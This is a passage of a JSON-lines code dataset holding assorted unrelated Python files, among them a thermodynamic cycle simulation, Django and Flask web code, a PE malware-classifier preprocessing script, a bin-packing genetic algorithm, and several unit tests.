h1.append(water1.enthalpy_mass)\n s1.append(water1.entropy_mass)\n t1.append(water1.T)\n \n #State after Pump\n water2 = cantera.Water()\n p2.append(7 * 10**6)\n water2.SP = s1[-1], p2[-1]\n h2_IS = water2.enthalpy_mass\n h2.append(h_OutCompressor(n_pump_Rankine, h2_IS, h1[-1]))\n water2.HP = h2[-1], p2[-1]\n t2.append(water2.T)\n s2.append(water2.entropy_mass)\n \n #State after HRSG\n water3Perf = cantera.Water()\n p3.append(p2[-1])\n water3Perf.TP = t8[-1], p3[-1]\n h3perfect = water3Perf.enthalpy_mass\n h3.append(n_heatExchanger * (h3perfect - h2[-1]) + h2[-1])\n water3 = cantera.Water()\n water3.HP = h3[-1], p3[-1]\n \n s3.append(water3.entropy_mass)\n t3.append(water3.T)\n x3.append(water3.X)\n \n #State After Turbine Rankine\n water4 = cantera.Water()\n p4.append(p1[-1])\n water4.SP = s3[-1], p4[-1]\n h4_IS = water4.enthalpy_mass\n h4.append(h_OutTurbine(n_turbine_Rankine, h4_IS, h3[-1]))\n water4.HP = h4[-1], p4[-1]\n t4.append(water4.T)\n s4.append(water4.entropy_mass)\n \n W_BraytonComp = h5[-1] - h6[-1]\n W_BraytonTurbine = h7[-1] - h8[-1]\n \n massRatio.append((h8[-1] - h9[-1]) / (h3[-1] - h2[-1]))\n \n W_RankinePump = massRatio[-1] * (h1[-1] - h2[-1])\n W_RankineTurbine = massRatio[-1] * (h3[-1] - h4[-1])\n \n W_Top = W_BraytonTurbine + W_BraytonComp \n W_Bottom = W_RankineTurbine + W_RankinePump\n W_NET.append(W_Top + W_Bottom)\n \n Q_In.append(h7[-1] - h6[-1])\n Q_Out.append(h4[-1] - h1[-1])\n \n n_thermal.append(W_NET[-1]/Q_In[-1])\n \n ri12.append(rev_irrev(h1[-1], h2[-1], s1[-1], s2[-1], t1[-1], 0, 0, massRatio[-1]))\n ri23.append(rev_irrev(h2[-1], h3[-1], s2[-1], s3[-1], t2[-1], (h3[-1] - h2[-1]), 0, massRatio[-1]))\n ri34.append(rev_irrev(h3[-1], h4[-1], s3[-1], s4[-1], t3[-1], 0, 0, massRatio[-1]))\n ri41.append(rev_irrev(h4[-1], h1[-1], s4[-1], s1[-1], t4[-1], 0, -Q_Out[-1], massRatio[-1]))\n \n ri56.append(rev_irrev(h5[-1], h6[-1], s5[-1], s6[-1], t5[-1], 0, 0, 1))\n ri67.append(rev_irrev(h6[-1], h7[-1], s6[-1], s7[-1], t6[-1], Q_In[-1], 0, 1))\n ri78.append(rev_irrev(h7[-1], h8[-1], s7[-1], s8[-1], t7[-1], 0, 0, 1))\n ri89.append(rev_irrev(h8[-1], h9[-1], s8[-1], s9[-1], t8[-1], 0, (h8[-1] - h9[-1]), 1))\n \n \npr = numpy.linspace(3.0, 20.0, 171)\npyplot.plot(pr, n_thermal)\nbestPR = n_thermal.index(max(n_thermal))\nprint('The max effeciency is: ', max(n_thermal))\nprint('The most effecient Pressure Ratio is: ', (bestPR + 30)/10.0)\n\n\n","sub_path":"Project2NewCode.py","file_name":"Project2NewCode.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"550653064","text":"from django.urls import path\nfrom . import views\nfrom .views import *\nfrom .webhooks import webhook\n\n\napp_name = 'profiles'\n\nurlpatterns = [\n path('coach_create///', views.coach_create, name='coach_create'),\n path('coach_list/', CoachList.as_view(), name='coach_list'),\n path('coachee_create/', CoacheeCreate.as_view(), name='coachee_create'),\n path('coachee_list/', CoacheeList.as_view(), name='coachee_list'),\n path('coachee_edit//', CoacheeEdit.as_view(), name='coachee_edit'),\n path('coachee_delete//', CoacheeDelete.as_view(), name='coachee_delete'),\n path('cache_data/', views.cache_data, name='cache_data'),\n path('wh/', webhook, name='webhook'),\n]\n","sub_path":"profiles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"574696641","text":"import operator\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\n\ndef getXY(path):\n # getting unimp features\n unimp_features = {\n 'AddressOfEntryPoint': 0,\n 'BaseOfCode': 0,\n 'BaseOfData': 0,\n 'Characteristics': 1032.206797186472,\n 'CheckSum': 0,\n 'DllCharacteristics': 1478.4954869782816,\n 'ExportNb': 0,\n 'FileAlignment': 0,\n # 'ImageBase': 530.5361006533311,\n 'ImageBase': 0,\n 'ImportsNb': 0,\n 'ImportsNbDLL': 0,\n 'ImportsNbOrdinal': 0,\n 'LoadConfigurationSize': 0,\n 'LoaderFlags': 0,\n 'Machine': 1082.9256010888016,\n 'MajorImageVersion': 0,\n 'MajorLinkerVersion': 0,\n 'MajorOperatingSystemVersion': 236.61647685302975,\n 'MajorSubsystemVersion': 487.3898733331374,\n 'MinorImageVersion': 0,\n 'MinorLinkerVersion': 0,\n 'MinorOperatingSystemVersion': 0,\n 'MinorSubsystemVersion': 0,\n 'Name': 0,\n 'NumberOfRvaAndSizes': 0,\n 'ResourcesMaxEntropy': 441.8248905853912,\n 'ResourcesMaxSize': 0,\n 'ResourcesMeanEntropy': 0,\n 'ResourcesMeanSize': 0,\n 'ResourcesMinEntropy': 353.224684768646,\n 'ResourcesMinSize': 8.160597671881105,\n 'ResourcesNb': 0,\n 'SectionAlignment': 0,\n 'SectionMaxRawsize': 0,\n 'SectionMaxVirtualsize': 0,\n 'SectionsMaxEntropy': 580.740479410044,\n 'SectionsMeanEntropy': 72.19620856510386,\n 'SectionsMeanRawsize': 0,\n 'SectionsMeanVirtualsize': 0,\n 'SectionsMinEntropy': 158.0840575679675,\n 'SectionsMinRawsize': 0,\n 'SectionsMinVirtualsize': 0,\n 'SectionsNb': 7.795926354766131,\n 'SizeOfCode': 0,\n 'SizeOfHeaders': 0,\n 'SizeOfHeapCommit': 0,\n 'SizeOfHeapReserve': 0,\n 'SizeOfImage': 0,\n 'SizeOfInitializedData': 0,\n 'SizeOfOptionalHeader': 393.1119115064255,\n 'SizeOfStackCommit': 0,\n 'SizeOfStackReserve': 93.14759692294628,\n 'SizeOfUninitializedData': 0,\n 'Subsystem': 590.0487097835594,\n 'VersionInformationSize': 648.0362688739431,\n 'md5': 0}\n unimp_features = sorted(unimp_features.items(), key=operator.itemgetter(1))\n unimp_features.reverse()\n unimp_features = unimp_features[16:]\n for i in range(len(unimp_features)):\n unimp_features[i] = unimp_features[i][0]\n \n # reading data\n dataset = pd.read_csv(path)\n dataset = dataset[dataset.columns.difference(unimp_features)]\n X = dataset.iloc[:,:-1].values\n y = dataset.iloc[:,-1].values\n \n # one-hot encoding (Categorical Data)\n from sklearn.preprocessing import LabelEncoder, OneHotEncoder\n labelencoder_X = LabelEncoder()\n \n # Label encoding\n X[:, 0] = labelencoder_X.fit_transform(X[:, 0])\n X[:, 1] = labelencoder_X.fit_transform(X[:, 1])\n X[:, 2] = labelencoder_X.fit_transform(X[:, 2])\n X[:, 3] = labelencoder_X.fit_transform(X[:, 3])\n X[:, 4] = labelencoder_X.fit_transform(X[:, 4])\n X[:, 14] = labelencoder_X.fit_transform(X[:, 14])\n \n for i in range(len(X[:, 14])):\n X[i, 14], X[i, 5] = X[i, 5], X[i, 14]\n \n onehotencoder = OneHotEncoder()\n Z = onehotencoder.fit_transform(X[:, :1]).toarray()\n Z = Z[:, 1:]\n X = X[:, 1:]\n \n W = onehotencoder.fit_transform(X[:, :1]).toarray()\n W = W[:, 1:]\n X = X[:, 1:]\n Z = np.concatenate((Z, W), 1)\n \n W = onehotencoder.fit_transform(X[:, :1]).toarray()\n W = W[:, 1:]\n X = X[:, 1:]\n Z = np.concatenate((Z, W), 1)\n \n W = onehotencoder.fit_transform(X[:, :1]).toarray()\n W = W[:, 1:]\n X = X[:, 1:]\n Z = np.concatenate((Z, W), 1)\n \n W = onehotencoder.fit_transform(X[:, :1]).toarray()\n W = W[:, 1:]\n X = X[:, 1:]\n Z = np.concatenate((Z, W), 1)\n \n W = onehotencoder.fit_transform(X[:, :1]).toarray()\n W = W[:, 1:]\n X = X[:, 1:]\n Z = np.concatenate((Z, W), 1)\n \n X = np.concatenate((Z, X), 1)\n \n # Scaling\n sc_X = StandardScaler()\n X = sc_X.fit_transform(X)\n \n return X, y\n\nX, y = getXY('/home/yash/Documents/Malware_Classifier_For_PE_Files/cleaned_data.csv')\n\n# train test split\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n### ----------------- RF -------------------- ###\nfrom Models.Logistic import Logistic\nmodel = Logistic(X_train, y_train)\n\ny_pred = model.predict(X_test)\n\ncount = 0\nfor i in range(len(y_pred)):\n if y_pred[i] == y_test[i]:\n count += 1\n\nacc = (count / len(y_pred)) * 100\nprint('Logistic Reg: {}'.format(acc))\n\n### ----------------------------------------- ###","sub_path":"01_data_preprocessing.py","file_name":"01_data_preprocessing.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"435046642","text":"import werkzeug\r\n\r\nwerkzeug.cached_property = werkzeug.utils.cached_property\r\nfrom flask import Flask\r\nfrom flask_restplus import Api, Resource\r\nfrom connector import construct_con_str\r\nfrom logic import crimes_between_dates, total_burglary\r\nfrom decorators import Decorators\r\nimport configparser\r\n\r\napp = Flask(__name__)\r\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = construct_con_str()\r\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\r\n\r\napi = Api(app)\r\nns = api.namespace(\"rest\", description=\"Assignment Rest\")\r\n\r\n\r\n@ns.route(\"/=\")\r\n@api.response(404, \"Nothing here but us lemmings\")\r\nclass ResToFrom(Resource):\r\n def get(self, fromdate, todate):\r\n return crimes_between_dates(fromdate, todate)\r\n\r\n def post(self, fromdate, todate):\r\n # I don't see the point in making a post method here as per the assignment desc...\r\n return None, 201\r\n\r\n\r\n@ns.route(\"/burglary\")\r\n@api.response(404, \"Nothing here but us lemmings\")\r\nclass ResBurglary(Resource):\r\n def get(self):\r\n return total_burglary()\r\n\r\n\r\n@Decorators.determine_environment\r\ndef flask_run():\r\n conf = configparser.ConfigParser()\r\n conf.read(\"configuration.ini\")\r\n\r\n if conf[\"DEFAULT\"][\"activeenvironment\"] == \"PRODUCTION\":\r\n app.run(host=\"0.0.0.0\")\r\n else:\r\n app.run(debug=True)\r\n","sub_path":"week8/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"149295406","text":"import random\nimport sys\nrandom.seed(0)\n\n\nclass Population_element:\n def __init__(self, vehicle_list, out_number):\n self.vehicle_list = vehicle_list\n self.out_number = out_number\n\nclass Vehicle:\n def __init__(self, vehicle_number, x, y):\n self.x = x\n self.y = y\n self.number = vehicle_number\n\n def rotateVehicle(self):\n temp = self.x\n self.x = self.y\n self.y = temp\n\nclass Area:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def placement(self, vehicle_list):\n self.area2d = [[0 for y in range(self.y)] for y in range(self.x)]\n for vehicle in vehicle_list:\n control = False\n for i in range(self.x):\n for j in range(self.y):\n if ((not control) and self.check_area(vehicle, (i,j))):\n for x in range(vehicle.x):\n for y in range(vehicle.y):\n self.area2d[i+x][j+y] = vehicle.number\n control = True\n return self.calculate_out_vehicles(vehicle_list)\n\n def check_area(self, vehicle, cordinate):\n i,j = cordinate\n x, y = vehicle.x, vehicle.y\n if ((x + i > self.x) or (y + j > self.y)):\n return False\n for k in range(x):\n for l in range(y):\n if ((not self.area2d[i+k][j+l] == 0)):\n return False\n return True\n\n def calculate_out_vehicles(self, vehicle_list):\n count = 0\n for vehicle in vehicle_list:\n if (not any(vehicle.number in sublist for sublist in self.area2d)):\n count += 1\n return count\n\n def print_area(self):\n for i in range(0,self.x):\n for j in range(0,self.y):\n if j < self.y-1:\n print(self.area2d[i][j], end=\"\\t\", file=sys.stdout)\n else:\n print(self.area2d[i][j], end=\"\", file=sys.stdout)\n #if i < self.x-1:\n print(\"\\n\", end=\"\", file=sys.stdout)\n\nclass GA:\n def __init__(self, area, vehicle_list1, vehicle_list2):\n self.area = area\n self.vehicleList1 = vehicle_list1\n self.vehicleList2 = vehicle_list2\n self.parent1 = random.sample(vehicle_list1, len(vehicle_list1))\n self.parent2 = random.sample(vehicle_list2, len(vehicle_list2))\n\n def crossover(self):\n rand1 = random.randint(0, len(self.parent1))\n rand2 = random.randint(rand1, len(self.parent1))\n\n self.child1 = self.parent1[rand1:rand2] # Multiple point Cross over\n for elem in self.parent2:\n if not elem in self.child1:\n self.child1.append(elem)\n\n rand1 = random.randint(0, len(self.parent2))\n rand2 = random.randint(rand1, len(self.parent2))\n\n self.child2 = self.parent2[rand1:rand2]\n for elem in self.parent1:\n if not elem in self.child2:\n self.child2.append(elem)\n\n def evaluation(self):\n population_array = [Population_element(self.parent1, self.area.placement(self.parent1)),\n Population_element(self.parent2, self.area.placement(self.parent2)),\n Population_element(self.child1, self.area.placement(self.child1)),\n Population_element(self.child2, self.area.placement(self.child2))]\n sorted_population_array = sorted(population_array, key=lambda x: x.out_number)\n self.parent1, self.parent2 = sorted_population_array[0].vehicle_list, sorted_population_array[1].vehicle_list\n if sorted_population_array[0].out_number == 0:\n return self.parent1\n if sorted_population_array[1].out_number == 0:\n return self.parent2\n return None\n\n def mutation(self):\n random1 = random.randint(0, len(self.parent2)-1)\n random2 = random.randint(0, len(self.parent2)-1)\n temp = self.parent2[random1]\n self.parent2[random1] = self.parent2[random2]\n self.parent2[random2] = temp\n\n def mutation2(self):\n if(len(self.parent1) < 15):\n random1 = random.randint(0, len(self.parent2)-int(len(self.parent2)/2)) \n self.parent2[random1].rotateVehicle()\n random2 = random.randint(random1, len(self.parent2)-1) \n self.parent2[random2].rotateVehicle()\n elif(len(self.parent1) >= 15 and len(self.parent1) <= 34):\n ctr=0 \n for i in range(0,int(len(self.parent2)/5)-1,1):\n random1 = random.randint(ctr, ctr+4)\n ctr+=5 \n self.parent2[random1].rotateVehicle()\n else:\n ctr=0 \n for i in range(0,int(len(self.parent2)/5)-1,1):\n random1 = random.randint(ctr, ctr+4)\n ctr+=5 \n self.parent2[random1].rotateVehicle()\n\nif __name__==\"__main__\": # \n firstInput = input()\n while (firstInput == \" \\n\" or firstInput == \"\\n\" or len(firstInput.split()) != 2):\n firstInput = input()\n splittedFirst = firstInput.split() # \\t\n areaX = splittedFirst[0]\n areaY = splittedFirst[1]\n area = Area(int(areaX), int(areaY)) #\n numVehicle = int(input()) # Get user input for number of vehicles\n vehicle_list1 = [] # \n vehicle_list2 = [] #\n #----------------------------------------------------------------------------------------\n for i in range(1,numVehicle+1,1): #\n vehSize = input().split() # \\t\n x = vehSize[0]\n y = vehSize[1] # \n vehicle_list1.append(Vehicle(i,int(x),int(y))) # Parent 1 # Create Vehicle object \n vehicle_list2.append(Vehicle(i,int(y),int(x))) # Rotated Parent 2 # Create Vehicle object after rotating process \n #totalVehicleArea += int(x) * int(y) # \n #print(\"Total Vehicle Area => \", totalVehicleArea) # Remove !!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n #----------------------------------------------------------------------------------------\n if (len(vehicle_list1) < 26 ):\n counterMt1 = 20\n counterMt2 = 900\n elif (len(vehicle_list1) >= 27) and (len(vehicle_list1) < 30 ):\n counterMt1 = 700\n counterMt2 = 100\n elif (len(vehicle_list1) >= 30) and (len(vehicle_list1) < 35 ):\n counterMt1 = 10\n counterMt2 = 500\n else:\n counterMt1 = 53\n counterMt2 = 13\n #------------------------------------------------------------------------------------\n ga = GA(area, vehicle_list1, vehicle_list2) # Create GA object by using 2 different parent argument\n result = vehicle_list1 # \n counter=0 # \n while(True):\n counter += 1 #\n ga.crossover() # \n result = ga.evaluation() # \n if result is not None: # \n area.placement(result) # \n area.print_area() # \n break\n if counter%counterMt1: # \n ga.mutation() # \n if counter%counterMt2: #\n ga.mutation2() #\n ","sub_path":"bin_packing.py","file_name":"bin_packing.py","file_ext":"py","file_size_in_byte":8631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"606578898","text":"import os\nimport time\nimport threading\n\nimport pytest\n\nfrom doit.filewatch import FileModifyWatcher, get_platform_system\n\n\ndef testUnsuportedPlatform(monkeypatch):\n monkeypatch.setattr(FileModifyWatcher, 'supported_platforms', ())\n pytest.raises(Exception, FileModifyWatcher, [])\n\n\nplatform = get_platform_system()\n@pytest.mark.skipif('platform not in FileModifyWatcher.supported_platforms')\nclass TestFileWatcher(object):\n def testInit(self, restore_cwd, tmpdir):\n dir1 = 'data3'\n files = ('data/w1.txt', 'data/w2.txt')\n tmpdir.mkdir('data')\n for fname in files:\n tmpdir.join(fname).open('a').close()\n os.chdir(tmpdir.strpath)\n\n fw = FileModifyWatcher((files[0], files[1], dir1))\n # file_list contains absolute paths\n assert 2 == len(fw.file_list)\n assert os.path.abspath(files[0]) in fw.file_list\n assert os.path.abspath(files[1]) in fw.file_list\n # watch_dirs\n assert 2 == len(fw.watch_dirs)\n assert tmpdir.join('data') in fw.watch_dirs\n assert tmpdir.join('data3') in fw.watch_dirs\n # notify_dirs\n assert 1 == len(fw.notify_dirs)\n assert tmpdir.join('data3') in fw.notify_dirs\n\n\n def testHandleEventNotSubclassed(self):\n fw = FileModifyWatcher([])\n pytest.raises(NotImplementedError, fw.handle_event, None)\n\n def testLoop(self, restore_cwd, tmpdir):\n files = ['data/w1.txt', 'data/w2.txt', 'data/w3.txt']\n stop_file = 'data/stop'\n tmpdir.mkdir('data')\n for fname in files + [stop_file]:\n tmpdir.join(fname).open('a').close()\n os.chdir(tmpdir.strpath)\n\n fw = FileModifyWatcher((files[0], files[1], stop_file))\n events = []\n should_stop = []\n started = []\n def handle_event(event):\n events.append(event.src_path)\n\n fw.handle_event = handle_event\n\n fw.loop()\n time.sleep(1)\n # write in watched file\n fd = open(files[0], 'w')\n fd.write(\"hi\")\n fd.close()\n # write in non-watched file\n fd = open(files[2], 'w')\n fd.write(\"hi\")\n fd.close()\n # write in another watched file\n fd = open(files[1], 'w')\n fd.write(\"hi\")\n fd.close()\n time.sleep(1)\n fw.observer.stop()\n fw.observer.join(1)\n\n assert os.path.abspath(files[0]) in events\n assert os.path.abspath(files[1]) in events\n","sub_path":"tests/test_filewatch.py","file_name":"test_filewatch.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"553798552","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencent is pleased to support the open source community by making 蓝鲸智云 - 监控平台 (BlueKing - Monitor) available.\nCopyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at http://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on\nan \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\n# Generated by Django 1.11.23 on 2021-07-08 03:17\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"bkmonitor\", \"0038_merge_20210707_1731\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"detectalgorithm\",\n name=\"algorithm_type\",\n field=models.CharField(\n choices=[\n (\"Threshold\", \"静态阈值算法\"),\n (\"SimpleRingRatio\", \"简易环比算法\"),\n (\"AdvancedRingRatio\", \"高级环比算法\"),\n (\"SimpleYearRound\", \"简易同比算法\"),\n (\"AdvancedYearRound\", \"高级同比算法\"),\n (\"PartialNodes\", \"部分节点数算法\"),\n (\"OsRestart\", \"主机重启算法\"),\n (\"ProcPort\", \"进程端口算法\"),\n (\"PingUnreachable\", \"Ping不可达算法\"),\n (\"YearRoundAmplitude\", \"同比振幅算法\"),\n (\"YearRoundRange\", \"同比区间算法\"),\n (\"RingRatioAmplitude\", \"环比振幅算法\"),\n (\"IntelligentDetect\", \"智能异常检测算法\"),\n ],\n max_length=128,\n verbose_name=\"算法类型\",\n ),\n ),\n ]\n","sub_path":"bkmonitor/migrations/0039_auto_20210708_1117.py","file_name":"0039_auto_20210708_1117.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"506907118","text":"#!/usr/bin/env python\n\nfrom math import *\nimport sys\n\na0 = 5.29e-9;\n\ndef calc_force_cor(x, q):\n\tbeta = 1.0\n\tl = 9.0 * a0\n\n\tdx = x[0] - x[1]\n\tr = sqrt(dx*dx)\n\tnumeric = q[0] * q[1] * beta\n\tf = numeric * ( -1.0/(r*r) * (1.0 - exp( (-r * r) / (l * l) )) + 2.0/(l*l) * exp((-r*r)/(l*l)) )\n\treturn f*dx/r\n\ndef calc_force(x, q):\n\tdx = x[0] -x[1]\n\tr = sqrt(dx*dx)\n\tnumeric = (-1.0) *q[0] * q[1]\n\t\n\tf_norm = numeric * (1.0/(r * r))\n\n\tf = f_norm*dx/r\n\treturn f;\n\ndef calc_potential_cor(x, q):\n\tbeta = 1.0\n\tl = 9.0 * a0;\n\n\tdx = x[0] - x[1]\n\tr = sqrt(dx*dx)\n\tnumeric = q[0] * q[1] * beta\n\tu = numeric * (1.0/r) * (1.0 - exp( (-r * r) / (l * l) ))\n\treturn u\n\n#def calc_force(x, q):\n\ndef calc_potential(x, q):\n\tdx = x[0] -x[1]\n\tr = sqrt(dx*dx)\n\tnumeric = q[0] * q[1]\n\tu = numeric * (1.0/r)\n\treturn u\n\t\nx = [0.0]*2\nm = [0.0]*2\nq = [0.0]*2\n\n#0 = electron\n#1 = proton\nm[0] = 9.1e-28\nm[1] = 1.67e-24\nq[0] = -4.8e-10\nq[1] = 4.8e-10\n\nx[1] = 0.0\n\npot_cor = open('pot_cor', 'w')\nforce_cor = open('force_cor', 'w')\npot = open('pot', 'w')\nforce = open('force', 'w')\npot_cor.write(\"#Dist\\tUnlike\\n\")\nforce_cor.write(\"#Dist\\tUnlike\\n\")\npot.write(\"#Dist\\tUnlike\\n\")\nforce.write(\"#Dist\\tUnlike\\n\")\n\n\nfor i in range(1,101):\n\tx[0] = float(i) * a0\n\tpot_cor.write(\"%f\\t%g\\n\" % (float((x[0]-x[1])/a0), calc_potential_cor(x,q)))\n\tforce_cor.write(\"%f\\t%g\\n\" % (float((x[0]-x[1])/a0), calc_force_cor(x,q)))\n\tpot.write(\"%f\\t%g\\n\" % (float((x[0]-x[1])/a0), calc_potential(x,q)))\n\tforce.write(\"%f\\t%g\\n\" % (float((x[0]-x[1])/a0), calc_force(x,q)))\n\t\n\npot_cor.close()\nforce_cor.close()\npot.close()\nforce.close()\n\n\t\n","sub_path":"scripts/force.py","file_name":"force.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"205504944","text":"r\"\"\"Test `lmp.util.load_dataset.`.\n\nUsage:\n python -m unittest test.lmp.util._dataset.test_load_dataset\n\"\"\"\n\n# built-in modules\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport inspect\nimport math\nimport unittest\n\nfrom typing import Union\n\n# self-made modules\n\nimport lmp.dataset\nimport lmp.util\n\n\nclass TestLoadDataset(unittest.TestCase):\n r\"\"\"Test case for `lmp.util.load_dataset`.\"\"\"\n\n def test_signature(self):\n r\"\"\"Ensure signature consistency.\"\"\"\n msg = 'Inconsistent method signature.'\n\n self.assertEqual(\n inspect.signature(lmp.util.load_dataset),\n inspect.Signature(\n parameters=[\n inspect.Parameter(\n name='dataset',\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n annotation=str,\n default=inspect.Parameter.empty\n )\n ],\n return_annotation=Union[\n lmp.dataset.AnalogyDataset,\n lmp.dataset.LanguageModelDataset\n ]\n ),\n msg=msg\n )\n\n def test_invalid_input_dataset(self):\n r\"\"\"Raise exception when input `dataset` is invalid.\"\"\"\n msg1 = (\n 'Must raise `TypeError` or `ValueError` when input `dataset` is '\n 'invalid.'\n )\n msg2 = 'Inconsistent error message.'\n examples = (\n False, True, 0, 1, -1, 0.0, 1.0, math.nan, -math.nan, math.inf,\n -math.inf, 0j, 1j, '', b'', (), [], {}, set(), object(),\n lambda x: x, type, None, NotImplemented, ...\n )\n\n for invalid_input in examples:\n with self.assertRaises(\n (TypeError, ValueError),\n msg=msg1\n ) as ctx_man:\n lmp.util.load_dataset(invalid_input)\n\n if isinstance(ctx_man.exception, TypeError):\n self.assertEqual(\n ctx_man.exception.args[0],\n '`dataset` must be an instance of `str`.',\n msg=msg2\n )\n else:\n self.assertEqual(\n ctx_man.exception.args[0],\n f'dataset `{invalid_input}` does not support.\\nSupported options:' +\n ''.join(list(map(\n lambda option: f'\\n\\t--dataset {option}',\n [\n 'news_collection_desc',\n 'news_collection_title',\n 'wiki_test_tokens',\n 'wiki_train_tokens',\n 'wiki_valid_tokens',\n 'word_test_v1'\n ]\n ))),\n msg=msg2\n )\n\n def test_return_type(self):\n r\"\"\"Return `Union[lmp.dataset.LanguageModelDataset, lmp.dataset.AnalogyDataset]`.\"\"\"\n msg = 'Must return `Union[lmp.dataset.LanguageModelDataset, lmp.dataset.AnalogyDataset]`.'\n\n examples = (\n ('news_collection_desc', lmp.dataset.LanguageModelDataset),\n ('news_collection_title', lmp.dataset.LanguageModelDataset),\n ('wiki_train_tokens', lmp.dataset.LanguageModelDataset),\n ('wiki_test_tokens', lmp.dataset.LanguageModelDataset),\n ('wiki_valid_tokens', lmp.dataset.LanguageModelDataset),\n ('word_test_v1', lmp.dataset.AnalogyDataset),\n )\n\n for dataset, dataset_cstr in examples:\n self.assertIsInstance(\n lmp.util.load_dataset(dataset=dataset),\n dataset_cstr,\n msg=msg\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/lmp/util/_dataset/test_load_dataset.py","file_name":"test_load_dataset.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"491732949","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2016 Supreeth Herle\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\"VBS Stats Module.\"\"\"\n\nfrom empower.vbsp.messages import statistics_pb2\nfrom empower.vbsp.messages import configs_pb2\n\nPRT_VBSP_RRC_STATS = \"mRRC_meas\"\n\nRRC_STATS_RAT_TYPE = {\n \"EUTRA\": statistics_pb2.RAT_EUTRA\n}\n\nRRC_STATS_REPORT_CONF_TYPE = \\\n [\"periodical_ref_signal\", \"A1\", \"A2\", \"A3\", \"A4\", \"A5\"]\n\nRRC_STATS_EVENT_THRESHOLD_TYPE = [\"RSRP\", \"RSRQ\"]\n\nRRC_STATS_TRIGGER_QUANT = {\n \"RSRP\": configs_pb2.TRIGQ_RSRP,\n \"RSRQ\": configs_pb2.TRIGQ_RSRQ\n}\n\nRRC_STATS_REPORT_INTR = {\n 1: configs_pb2.REPINT_ms1024,\n 2: configs_pb2.REPINT_ms2048,\n 5: configs_pb2.REPINT_ms5120,\n 10: configs_pb2.REPINT_ms10240,\n 60: configs_pb2.REPINT_min1,\n 360: configs_pb2.REPINT_min6,\n 720: configs_pb2.REPINT_min12,\n 1800: configs_pb2.REPINT_min30,\n 3600: configs_pb2.REPINT_min60\n}\n\nRRC_STATS_NUM_REPORTS = {\n 1: configs_pb2.REPAMT_1,\n 2: configs_pb2.REPAMT_2,\n 4: configs_pb2.REPAMT_4,\n 8: configs_pb2.REPAMT_8,\n 16: configs_pb2.REPAMT_16,\n 32: configs_pb2.REPAMT_32,\n 64: configs_pb2.REPAMT_64,\n \"infinite\": configs_pb2.REPAMT_infinity\n}\n\nRRC_STATS_BW = {\n 6: configs_pb2.AMBW_6,\n 15: configs_pb2.AMBW_15,\n 25: configs_pb2.AMBW_25,\n 50: configs_pb2.AMBW_50,\n 75: configs_pb2.AMBW_75,\n 100: configs_pb2.AMBW_100\n}\n","sub_path":"empower/vbs_stats/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"156797853","text":"# Copyright 2018 D-Wave Systems Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport unittest\n\nimport dimod\nimport hybrid\nfrom hybrid.core import State\nfrom hybrid.concurrency import Present, Future, ImmediateExecutor, immediate_executor\nfrom hybrid.testing import RunTimeAssertionMixin\nfrom hybrid.utils import 